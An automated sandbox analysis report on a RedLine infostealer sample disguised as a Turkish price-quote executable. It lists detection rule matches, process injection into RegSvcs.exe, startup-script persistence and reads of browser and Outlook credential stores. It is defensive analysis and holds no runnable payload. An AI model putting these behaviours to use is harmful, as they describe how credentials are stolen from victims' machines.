Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0316D1E0	11_2_0316D1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_03161030	11_2_03161030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0612EE88	11_2_0612EE88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06129688	11_2_06129688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0612BCE8	11_2_0612BCE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06126268	11_2_06126268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06120006	11_2_06120006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06120040	11_2_06120040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06ED0620	11_2_06ED0620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06ED5420	11_2_06ED5420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06EDA2C0	11_2_06EDA2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06ED63A8	11_2_06ED63A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06ED1710	11_2_06ED1710

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: String function: 0099F9F2 appears 40 times
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: String function: 009A0A30 appears 46 times
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: String function: 00989CB3 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 00FCF9F2 appears 40 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 00FB9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 00FD0A30 appears 46 times

Source: F#U0130YAT TEKL#U0130F.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 6.2.name.exe.3670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.name.exe.12a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.RegSvcs.exe.2ae0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.2ae0ee8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.274f4de.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.RegSvcs.exe.3b93d90.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.274f4de.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.27503c6.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.3b46458.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.5240000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.3b45570.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.3b45570.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.27503c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.2ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.3833407043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000006.00000002.3720636618.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000002.3833226149.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, c2bZQnG.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, c2bZQnG.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, Q1L0K.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, Q1L0K.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/10@3/2

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009F37B5 GetLastError,FormatMessageW,

0_2_009F37B5

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009E10BF AdjustTokenPrivileges,CloseHandle,	0_2_009E10BF
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_009E16C3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_010110BF AdjustTokenPrivileges,CloseHandle,	6_2_010110BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_010116C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	6_2_010116C3

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009F51CD

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_00A0A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00A0A67C

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_009F648E

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_009842A2

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

File created: C:\Users\user\AppData\Local\directory

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

File created: C:\Users\user\AppData\Local\Temp\autBC22.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Source: F#U0130YAT TEKL#U0130F.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: F#U0130YAT TEKL#U0130F.exe	ReversingLabs: Detection: 47%
Source: F#U0130YAT TEKL#U0130F.exe	Virustotal: Detection: 39%

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

File read: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe"
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: F#U0130YAT TEKL#U0130F.exe

Static file information: File size 1210368 > 1048576

Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: F#U0130YAT TEKL#U0130F.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4570703429.000000000322D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.4574444368.0000000004693000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000006.00000003.3712788813.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.3713380322.0000000003860000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3829363478.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3830095011.0000000003A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000006.00000003.3712788813.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.3713380322.0000000003860000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3829363478.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3830095011.0000000003A60000.00000004.00001000.00020000.00000000.sdmp

Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: F#U0130YAT TEKL#U0130F.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 7.2.RegSvcs.exe.3b46458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.RegSvcs.exe.3b93d90.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.RegSvcs.exe.5240000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.RegSvcs.exe.2ae0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.RegSvcs.exe.27503c6.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe

Code function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009842DE

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe	Code function: 0_2_009A0A76 push ecx; ret	0_2_009A0A89
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00FD0A76 push ecx; ret	6_2_00FD0A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041C40C push cs; iretd	7_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00423149 push eax; ret	7_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041C50E push cs; iretd	7_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004231C8 push eax; ret	7_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040E21D push ecx; ret	7_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041C6BE push ebx; ret	7_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06565965 pushfd ; ret	7_2_06565967
